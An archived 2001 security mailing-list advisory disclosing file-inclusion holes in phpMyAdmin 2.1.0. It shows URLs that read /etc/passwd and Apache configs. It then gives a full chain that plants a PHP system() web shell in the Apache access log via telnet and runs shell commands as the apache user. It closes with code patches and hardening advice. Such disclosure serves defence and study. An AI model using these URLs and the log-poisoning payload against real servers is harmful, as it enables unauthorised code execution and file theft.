arbitrary PHP Codes as apache user. From: <sl4shat_private> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Date: Sun, 1 Jul 2001 23:43:17 GMT Message-id: <200107012343.115eat_private> Note : sorry for my pity english. ***************************************************** ******************************* First of all, i want to ask a question, is it normal that if, in a MySQL query -via PHP-, i put "select * from $table" . "_files where ID=3D1" and i post table=3D"atable #", MySQL consider the new query as a valid one (so the final query will be "select * from atable") ? It's, in my opinion, a serious hole in MySQL query... (I use mysql_query() to do this) ***************************************************** ******************************* In this text, i will assume that i've an access to the phpMyAdmin of victim.com and that phpMyAdmin is located at http://www.victim.com/phpMyAdmin * Overview phpMyAdmin is a usefull php tool for managing a MySQL database through a=20 web-based interface. phpMyAdmin is used a lot on web provider who give access to a MySQL database. for more information see : http://www.phpwizard.net/projects/phpMyAdmin/ The holes described below were tested on a Debian 2.2 and on a RedHat 7.1 with phpMyAdmin 2.1.0. I. The phpMyAdmin 2.1.0 holes There's two include() holes in phpMyAdmin 2.1.0 - this is the latest version but it may work on the older's ones. These two holes can be reach with something like this : =20 http://www.victim.com/phpMyAdmin/sql.php?goto=3D/etc/pa sswd&btnDrop=3DNo (*) and =20 http://www.victim.com/phpMyAdmin/tbl_replace.php?db=3Dt est&table=3Dess&goto=3D/etc/passwd Of course, to exploit this holes, the attacker need to be logged on remote phpMyAdmin. These holes come from a line like this : 'include($goto);' in sql.php and in tbl_replace.php. With this you could read a lot of file, and execute every php code in the remote server. (*) Note : for btnDrop the value could be in other language (in my configuration, i must put 'Non' instead of 'No'). II. Using world readable (apache) log files to execute our own php codes By using world readable log files (here, i will use apache log files but you can use others log files like lastlog (in giving the good login), telnet log file, ftp log file...) , you can execute, with the hole described before, the php code you want. First, you get the apache configuration file to know where logs are : =20 http://www.victim.com/phpMyAdmin/sql.php?goto=3D/etc/ap ache/conf/httpd.conf&btnDrop=3DNo =20 http://www.victim.com/phpMyAdmin/sql.php?goto=3D/etc/ap ache/conf/srm.conf&btnDrop=3DNo =20 http://www.victim.com/phpMyAdmin/sql.php?goto=3D/etc/ap ache/conf/access.conf&btnDrop=3DNo Now, we assume that logs are in /var/log/httpd/error_log for errors and in /var/log/httpd/access_log for apache access (it must be the default in RedHat 7.1). we telnet to port 80 : # telnet www.victim.com 80 Trying xxx.xxx.xxx.xxx... Connected to www.victim.com. Escape character is '^]'. get <pre><? system(stripslashes($parameters)); ?></pre> ^] telnet> quit Connection closed. #=20 Here, after get, we can put any php code we want. Now, we can execute any remote command we want as apache user by doing : http://www.victim.com/phpMyAdmin/sql.php?goto=3D/var/lo g/httpd/access_log&btnDrop=3DNo¶meters=3Dls%20-l%20/ (in fact, by sending a unix command to parameters). Now, you're able to do nearly whatever apache user could do. III. Solutions The solutions to the phpMyAdmin holes are to put user access control, restrict the users able to access to phpMyAdmin, etc... The code manipulations to avoid this holes are : in sql.php : replace : if(file_exists($goto)) { include("header.inc.php"); if(isset($zero_rows) && !empty($zero_rows)) $message =3D $zero_rows; else $message =3D $strEmptyResultSet; include($goto); } else { $message =3D $zero_rows; Header("Location: $goto"); } by : $message =3D $zero_rows; Header("Location: $goto"); and in tbl_replace.php : replace : if(file_exists($goto)) { include("header.inc.php"); $message =3D $strModifications; include($goto); } else Header("Location: $goto"); exit; by : Header("Location: $goto"); Of course, phpMyAdmin could not work properly after this correction (not tested). For the second hole (world readable log files), just put all the log files you can to read-write for root and nothing for others. Also try to do not put something like include($params); in your php codes (or others server-side language like perl). Remove authorization for unix functions in the PHP configuration. Slash <slash-rtcat_private> [RtC] =20 ____________________________________________________________= __________________ ifrance.com, l'email gratuit le plus complet de l'Internet ! vos emails depuis un navigateur, en POP3, sur Minitel, sur l= e WAP... http://www.ifrance.com/_reloc/email.emailif
This archive was generated by hypermail 2b30 : Mon Jul 02 2001 - 02:53:36 PDT